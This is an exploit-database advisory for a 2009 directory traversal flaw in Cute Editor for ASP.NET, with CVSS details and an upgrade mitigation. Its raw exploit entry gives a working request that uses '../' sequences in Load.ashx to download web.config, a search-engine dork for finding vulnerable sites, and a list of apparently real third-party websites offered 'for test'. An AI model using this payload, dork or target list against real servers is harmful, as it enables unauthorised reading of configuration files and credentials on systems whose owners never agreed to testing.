Remote File Download

vendor:

Cute Editor

by:

Securitylab.ir

6,4

CVSS

MEDIUM

Remote File Download

CWE

Product Name: Cute Editor

Affected Version From: ASP.NET

Affected Version To: ASP.NET

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

A vulnerability in Cute Editor ASP.NET allows remote attackers to download arbitrary files from the web server via a ../ (dot dot) in the type parameter to Load.ashx.

Mitigation:

Upgrade to the latest version of Cute Editor

Source

Exploit-DB raw data:

 ######################### Securitylab.ir ########################
# Application Info:
# Name: Cute Editor
# Version: ASP.NET
# Website: http://cutesoft.net
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
# Dork: inurl:CuteSoft_Client/CuteEditor
#===========================================================
# http://www.site.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
#===========================================================
#################################################################
# For test:
# http://cuteeditor.51aspx.com
# http://ttgo.cc/company
# http://www.auditon.co.il
#################################################################
# Securitylab Security Research Team
###################################################################

# milw0rm.com [2009-05-26]